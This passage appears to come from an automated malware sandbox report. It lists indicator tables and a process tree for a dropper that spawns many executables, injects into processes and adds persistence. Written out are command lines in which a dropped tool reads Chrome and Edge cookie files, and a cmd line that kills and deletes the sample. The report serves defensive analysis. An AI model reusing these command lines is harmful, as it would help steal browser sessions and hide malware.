4672	WerFault.exe
4672	WerFault.exe
4672	WerFault.exe
4672	WerFault.exe
4672	WerFault.exe
3024	Process not Found
3024	Process not Found
3024	Process not Found
3024	Process not Found
3024	Process not Found
3024	Process not Found
3024	Process not Found
3024	Process not Found
3024	Process not Found
3024	Process not Found
3024	Process not Found
3024	Process not Found
3024	Process not Found
3024	Process not Found
3024	Process not Found
3024	Process not Found
5224	WerFault.exe
5224	WerFault.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
4340	MicrosoftEdgeCP.exe
4504	x2BFjy8SRtdIV0VKlMSL7WDQ.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3692	KRSetp.exe
Token: SeDebugPrivilege	3356	7175645.exe
Token: SeDebugPrivilege	1568	6172656.exe
Token: SeDebugPrivilege	1108	MicrosoftEdge.exe
Token: SeDebugPrivilege	1108	MicrosoftEdge.exe
Token: SeDebugPrivilege	1108	MicrosoftEdge.exe
Token: SeDebugPrivilege	1108	MicrosoftEdge.exe
Token: SeDebugPrivilege	1308	4192468.exe
Token: SeDebugPrivilege	4492	rundll32.exe
Token: SeDebugPrivilege	4492	rundll32.exe
Token: SeDebugPrivilege	1152	svchost.exe
Token: SeDebugPrivilege	4492	rundll32.exe
Token: SeDebugPrivilege	4492	rundll32.exe
Token: SeDebugPrivilege	4492	rundll32.exe
Token: SeDebugPrivilege	4492	rundll32.exe
Token: SeDebugPrivilege	4492	rundll32.exe
Token: SeDebugPrivilege	4492	rundll32.exe
Token: SeDebugPrivilege	4492	rundll32.exe
Token: SeDebugPrivilege	4492	rundll32.exe
Token: SeDebugPrivilege	4492	rundll32.exe
Token: SeDebugPrivilege	4492	rundll32.exe
Token: SeDebugPrivilege	4492	rundll32.exe
Token: SeDebugPrivilege	4512	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4512	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4512	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4512	MicrosoftEdgeCP.exe
Token: SeAssignPrimaryTokenPrivilege	2660	svchost.exe
Token: SeIncreaseQuotaPrivilege	2660	svchost.exe
Token: SeSecurityPrivilege	2660	svchost.exe
Token: SeTakeOwnershipPrivilege	2660	svchost.exe
Token: SeLoadDriverPrivilege	2660	svchost.exe
Token: SeSystemtimePrivilege	2660	svchost.exe
Token: SeBackupPrivilege	2660	svchost.exe
Token: SeRestorePrivilege	2660	svchost.exe
Token: SeShutdownPrivilege	2660	svchost.exe
Token: SeSystemEnvironmentPrivilege	2660	svchost.exe
Token: SeUndockPrivilege	2660	svchost.exe
Token: SeManageVolumePrivilege	2660	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2660	svchost.exe
Token: SeIncreaseQuotaPrivilege	2660	svchost.exe
Token: SeSecurityPrivilege	2660	svchost.exe
Token: SeTakeOwnershipPrivilege	2660	svchost.exe
Token: SeLoadDriverPrivilege	2660	svchost.exe
Token: SeSystemtimePrivilege	2660	svchost.exe
Token: SeBackupPrivilege	2660	svchost.exe
Token: SeRestorePrivilege	2660	svchost.exe
Token: SeShutdownPrivilege	2660	svchost.exe
Token: SeSystemEnvironmentPrivilege	2660	svchost.exe
Token: SeUndockPrivilege	2660	svchost.exe
Token: SeManageVolumePrivilege	2660	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2660	svchost.exe
Token: SeIncreaseQuotaPrivilege	2660	svchost.exe
Token: SeSecurityPrivilege	2660	svchost.exe
Token: SeTakeOwnershipPrivilege	2660	svchost.exe
Token: SeLoadDriverPrivilege	2660	svchost.exe
Token: SeSystemtimePrivilege	2660	svchost.exe
Token: SeBackupPrivilege	2660	svchost.exe
Token: SeRestorePrivilege	2660	svchost.exe
Token: SeShutdownPrivilege	2660	svchost.exe
Token: SeSystemEnvironmentPrivilege	2660	svchost.exe
Token: SeUndockPrivilege	2660	svchost.exe
Token: SeManageVolumePrivilege	2660	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2660	svchost.exe
Token: SeIncreaseQuotaPrivilege	2660	svchost.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
3024	Process not Found
3024	Process not Found

Suspicious use of SetWindowsHookEx 17 IoCs

pid	Process
1108	MicrosoftEdge.exe
4340	MicrosoftEdgeCP.exe
4340	MicrosoftEdgeCP.exe
4940	Installation.exe
5588	Btk434tTOK06nw6mkoBp_n6Z.exe
5676	v_6wCPhLcl2V_gdq2coOqIvq.exe
5776	x2BFjy8SRtdIV0VKlMSL7WDQ.exe
5784	WdlRWF3gZ0pgsPt7bgSF6z9A.exe
5968	ObvJhkjc1_yeOR8FBjF3Ixme.exe
6020	dXBNAKqK98ZCDCS5MKKJLYPr.exe
5700	B5Zne25cheXMr5C6pGJaqOCd.exe
3940	N5awg6WF21NeZ4xqPl67lJoP.exe
2368	AcakfVHVK3ZpOKofv4SFb_LD.exe
420	customer3.exe
4764	md8_8eus.exe
5560	jfiag3g_gg.exe
4708	WerFault.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 664 wrote to memory of 3692	664	EB7233922891E1DAD0434FBD52623647.exe	75
PID 664 wrote to memory of 3692	664	EB7233922891E1DAD0434FBD52623647.exe	75
PID 3692 wrote to memory of 3356	3692	KRSetp.exe	77
PID 3692 wrote to memory of 3356	3692	KRSetp.exe	77
PID 3692 wrote to memory of 1452	3692	KRSetp.exe	78
PID 3692 wrote to memory of 1452	3692	KRSetp.exe	78
PID 3692 wrote to memory of 1452	3692	KRSetp.exe	78
PID 3692 wrote to memory of 1308	3692	KRSetp.exe	79
PID 3692 wrote to memory of 1308	3692	KRSetp.exe	79
PID 3692 wrote to memory of 1308	3692	KRSetp.exe	79
PID 3692 wrote to memory of 1568	3692	KRSetp.exe	81
PID 3692 wrote to memory of 1568	3692	KRSetp.exe	81
PID 3692 wrote to memory of 1568	3692	KRSetp.exe	81
PID 1452 wrote to memory of 3832	1452	2464796.exe	82
PID 1452 wrote to memory of 3832	1452	2464796.exe	82
PID 1452 wrote to memory of 3832	1452	2464796.exe	82
PID 664 wrote to memory of 4148	664	EB7233922891E1DAD0434FBD52623647.exe	86
PID 664 wrote to memory of 4148	664	EB7233922891E1DAD0434FBD52623647.exe	86
PID 664 wrote to memory of 4148	664	EB7233922891E1DAD0434FBD52623647.exe	86
PID 4148 wrote to memory of 4252	4148	Folder.exe	88
PID 4148 wrote to memory of 4252	4148	Folder.exe	88
PID 4148 wrote to memory of 4252	4148	Folder.exe	88
PID 664 wrote to memory of 4308	664	EB7233922891E1DAD0434FBD52623647.exe	90
PID 664 wrote to memory of 4308	664	EB7233922891E1DAD0434FBD52623647.exe	90
PID 664 wrote to memory of 4308	664	EB7233922891E1DAD0434FBD52623647.exe	90
PID 4464 wrote to memory of 4492	4464	rUNdlL32.eXe	94
PID 4464 wrote to memory of 4492	4464	rUNdlL32.eXe	94
PID 4464 wrote to memory of 4492	4464	rUNdlL32.eXe	94
PID 4492 wrote to memory of 1152	4492	rundll32.exe	69
PID 4492 wrote to memory of 2768	4492	rundll32.exe	32
PID 1152 wrote to memory of 4660	1152	svchost.exe	96
PID 1152 wrote to memory of 4660	1152	svchost.exe	96
PID 1152 wrote to memory of 4660	1152	svchost.exe	96
PID 4492 wrote to memory of 1004	4492	rundll32.exe	11
PID 4492 wrote to memory of 2460	4492	rundll32.exe	45
PID 4492 wrote to memory of 2424	4492	rundll32.exe	27
PID 4492 wrote to memory of 1096	4492	rundll32.exe	12
PID 4492 wrote to memory of 932	4492	rundll32.exe	60
PID 4492 wrote to memory of 1296	4492	rundll32.exe	54
PID 4492 wrote to memory of 1764	4492	rundll32.exe	19
PID 4492 wrote to memory of 1136	4492	rundll32.exe	56
PID 4492 wrote to memory of 1344	4492	rundll32.exe	15
PID 4492 wrote to memory of 2660	4492	rundll32.exe	31
PID 4492 wrote to memory of 2688	4492	rundll32.exe	43
PID 4340 wrote to memory of 4512	4340	MicrosoftEdgeCP.exe	95
PID 4340 wrote to memory of 4512	4340	MicrosoftEdgeCP.exe	95
PID 4340 wrote to memory of 4512	4340	MicrosoftEdgeCP.exe	95
PID 4340 wrote to memory of 4512	4340	MicrosoftEdgeCP.exe	95
PID 4872 wrote to memory of 4476	4872	svchost.exe	100
PID 4872 wrote to memory of 4476	4872	svchost.exe	100
PID 4872 wrote to memory of 4476	4872	svchost.exe	100
PID 664 wrote to memory of 4940	664	EB7233922891E1DAD0434FBD52623647.exe	101
PID 664 wrote to memory of 4940	664	EB7233922891E1DAD0434FBD52623647.exe	101
PID 664 wrote to memory of 4940	664	EB7233922891E1DAD0434FBD52623647.exe	101
PID 1152 wrote to memory of 5160	1152	svchost.exe	103
PID 1152 wrote to memory of 5160	1152	svchost.exe	103
PID 1152 wrote to memory of 5160	1152	svchost.exe	103
PID 4940 wrote to memory of 5588	4940	Installation.exe	108
PID 4940 wrote to memory of 5588	4940	Installation.exe	108
PID 4940 wrote to memory of 5588	4940	Installation.exe	108
PID 4940 wrote to memory of 5600	4940	Installation.exe	107
PID 4940 wrote to memory of 5600	4940	Installation.exe	107
PID 4940 wrote to memory of 5612	4940	Installation.exe	106
PID 4940 wrote to memory of 5612	4940	Installation.exe	106

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:1004

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1096

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1344

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1764

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2424

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2660

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2768

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2688

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2460

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1296

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1136

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:932
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  2⤵
  PID:6892

C:\Users\Admin\AppData\Local\Temp\EB7233922891E1DAD0434FBD52623647.exe
"C:\Users\Admin\AppData\Local\Temp\EB7233922891E1DAD0434FBD52623647.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:664
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\KRSetp.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\KRSetp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3692
- - C:\Users\Admin\AppData\Roaming\7175645.exe
    "C:\Users\Admin\AppData\Roaming\7175645.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3356
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 3356 -s 1940
      4⤵
      Program crash
      PID:6196
- - C:\Users\Admin\AppData\Roaming\2464796.exe
    "C:\Users\Admin\AppData\Roaming\2464796.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:1452
  - - C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
      4⤵
      Executes dropped EXE
      PID:3832
- - C:\Users\Admin\AppData\Roaming\4192468.exe
    "C:\Users\Admin\AppData\Roaming\4192468.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1308
- - C:\Users\Admin\AppData\Roaming\6172656.exe
    "C:\Users\Admin\AppData\Roaming\6172656.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1568
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 2100
      4⤵
      Program crash
      PID:6748
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4148
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe" -a
    3⤵
    - Executes dropped EXE
    PID:4252
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\Info.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Info.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:4308
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Info.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Info.exe"
    3⤵
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Modifies system certificate store
    PID:4476
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\Installation.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Installation.exe"
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4940
- - C:\Users\Admin\Documents\oqNhLVxhlxKM6YjGsS_9x8pH.exe
    "C:\Users\Admin\Documents\oqNhLVxhlxKM6YjGsS_9x8pH.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:5612
  - - C:\Users\Admin\Documents\oqNhLVxhlxKM6YjGsS_9x8pH.exe
      C:\Users\Admin\Documents\oqNhLVxhlxKM6YjGsS_9x8pH.exe
      4⤵
      Executes dropped EXE
      PID:3544
- - C:\Users\Admin\Documents\Quu8x8ZMl6ldwF_wtPL3DLIm.exe
    "C:\Users\Admin\Documents\Quu8x8ZMl6ldwF_wtPL3DLIm.exe"
    3⤵
    - Executes dropped EXE
    PID:5600
  - - C:\Users\Admin\AppData\Roaming\1390733.exe
      "C:\Users\Admin\AppData\Roaming\1390733.exe"
      4⤵
      Executes dropped EXE
      PID:5660
  - - C:\Users\Admin\AppData\Roaming\7550324.exe
      "C:\Users\Admin\AppData\Roaming\7550324.exe"
      4⤵
      Executes dropped EXE
      PID:4772
  - - C:\Users\Admin\AppData\Roaming\6180204.exe
      "C:\Users\Admin\AppData\Roaming\6180204.exe"
      4⤵
      Executes dropped EXE
      PID:5064
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 5064 -s 1920
        5⤵
        Program crash
        
        PID:6440
  - - C:\Users\Admin\AppData\Roaming\3955826.exe
      "C:\Users\Admin\AppData\Roaming\3955826.exe"
      4⤵
      Executes dropped EXE
      PID:2240
- - C:\Users\Admin\Documents\Btk434tTOK06nw6mkoBp_n6Z.exe
    "C:\Users\Admin\Documents\Btk434tTOK06nw6mkoBp_n6Z.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:5588
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 664
      4⤵
      Drops file in Windows directory
      Program crash
      Suspicious behavior: EnumeratesProcesses
      PID:4672
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 652
      4⤵
      Program crash
      Suspicious behavior: EnumeratesProcesses
      PID:5224
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 684
      4⤵
      Program crash
      PID:4700
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 652
      4⤵
      Program crash
      PID:5252
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 1008
      4⤵
      Program crash
      PID:4784
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 1220
      4⤵
      Program crash
      PID:4712
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 1260
      4⤵
      Program crash
      PID:6052
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 1324
      4⤵
      Program crash
      PID:5844
- - C:\Users\Admin\Documents\It7kGgbjATGQWRkcPZ4IaJpe.exe
    "C:\Users\Admin\Documents\It7kGgbjATGQWRkcPZ4IaJpe.exe"
    3⤵
    - Executes dropped EXE
    PID:5664
  - - C:\Users\Admin\Documents\It7kGgbjATGQWRkcPZ4IaJpe.exe
      "C:\Users\Admin\Documents\It7kGgbjATGQWRkcPZ4IaJpe.exe"
      4⤵
      PID:6268
- - C:\Users\Admin\Documents\s_1qMRJQ1WKBPJcVMh5ys7tr.exe
    "C:\Users\Admin\Documents\s_1qMRJQ1WKBPJcVMh5ys7tr.exe"
    3⤵
    - Executes dropped EXE
    PID:5712
  - - C:\Users\Admin\Documents\s_1qMRJQ1WKBPJcVMh5ys7tr.exe
      "C:\Users\Admin\Documents\s_1qMRJQ1WKBPJcVMh5ys7tr.exe"
      4⤵
      PID:4228
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        5⤵
        
        PID:6296
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        6⤵
        
        PID:5144
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe"
        5⤵
        
        PID:4352
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffad16b4f50,0x7ffad16b4f60,0x7ffad16b4f70
        6⤵
        
        PID:6588
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1820,14801789912050967676,16762598100953213453,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1832 /prefetch:2
        6⤵
        
        PID:5280
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1820,14801789912050967676,16762598100953213453,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1892 /prefetch:8
        6⤵
        
        PID:5040
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1820,14801789912050967676,16762598100953213453,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1880 /prefetch:8
        6⤵
        
        PID:6344
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1820,14801789912050967676,16762598100953213453,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2564 /prefetch:1
        6⤵
        
        PID:3344
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1820,14801789912050967676,16762598100953213453,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2620 /prefetch:1
        6⤵
        
        PID:4276
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1820,14801789912050967676,16762598100953213453,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=2 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:1
        6⤵
        
        PID:5388
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1820,14801789912050967676,16762598100953213453,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
        6⤵
        
        PID:4056
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1820,14801789912050967676,16762598100953213453,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1
        6⤵
        
        PID:3696
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1820,14801789912050967676,16762598100953213453,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
        6⤵
        
        PID:4968
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1820,14801789912050967676,16762598100953213453,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5736 /prefetch:8
        6⤵
        
        PID:1308
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C taskkill /F /PID 4228 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\s_1qMRJQ1WKBPJcVMh5ys7tr.exe"
        5⤵
        
        PID:5112
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 4228
        6⤵
        Kills process with taskkill
        
        PID:6100
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C taskkill /F /PID 4228 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\s_1qMRJQ1WKBPJcVMh5ys7tr.exe"
        5⤵
        
        PID:360
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 4228
        6⤵
        Kills process with taskkill
        
        PID:5856
- - C:\Users\Admin\Documents\B5Zne25cheXMr5C6pGJaqOCd.exe
    "C:\Users\Admin\Documents\B5Zne25cheXMr5C6pGJaqOCd.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:5700
- - C:\Users\Admin\Documents\fv6XVc_uoD3O9arHr5yy9k2k.exe
    "C:\Users\Admin\Documents\fv6XVc_uoD3O9arHr5yy9k2k.exe"
    3⤵
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:5688
- - C:\Users\Admin\Documents\v_6wCPhLcl2V_gdq2coOqIvq.exe
    "C:\Users\Admin\Documents\v_6wCPhLcl2V_gdq2coOqIvq.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:5676
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:4708
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:4804
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:6456
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:6984
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 5676 -s 1528
      4⤵
      Program crash
      PID:5356
- - C:\Users\Admin\Documents\x2BFjy8SRtdIV0VKlMSL7WDQ.exe
    "C:\Users\Admin\Documents\x2BFjy8SRtdIV0VKlMSL7WDQ.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of SetWindowsHookEx
    PID:5776
  - - C:\Users\Admin\Documents\x2BFjy8SRtdIV0VKlMSL7WDQ.exe
      "C:\Users\Admin\Documents\x2BFjy8SRtdIV0VKlMSL7WDQ.exe"
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      PID:4504
- - C:\Users\Admin\Documents\WdlRWF3gZ0pgsPt7bgSF6z9A.exe
    "C:\Users\Admin\Documents\WdlRWF3gZ0pgsPt7bgSF6z9A.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:5784
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 764
      4⤵
      Program crash
      PID:5796
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 780
      4⤵
      Program crash
      PID:1680
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 764
      4⤵
      Program crash
      PID:4320
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 820
      4⤵
      Program crash
      PID:5128
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 952
      4⤵
      Program crash
      PID:5208
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 980
      4⤵
      Program crash
      PID:1060
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 996
      4⤵
      Program crash
      PID:5228
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 1056
      4⤵
      Program crash
      PID:4620
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 1444
      4⤵
      Program crash
      PID:3788
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 1540
      4⤵
      Executes dropped EXE
      Program crash
      Suspicious use of SetWindowsHookEx
      PID:4708
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 1580
      4⤵
      Program crash
      PID:1564
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 1568
      4⤵
      Program crash
      PID:5444
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 1800
      4⤵
      Program crash
      PID:6532
- - C:\Users\Admin\Documents\hKY8VniYB7kDoypSrH3gf9gF.exe
    "C:\Users\Admin\Documents\hKY8VniYB7kDoypSrH3gf9gF.exe"
    3⤵
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:6028
- - C:\Users\Admin\Documents\dXBNAKqK98ZCDCS5MKKJLYPr.exe
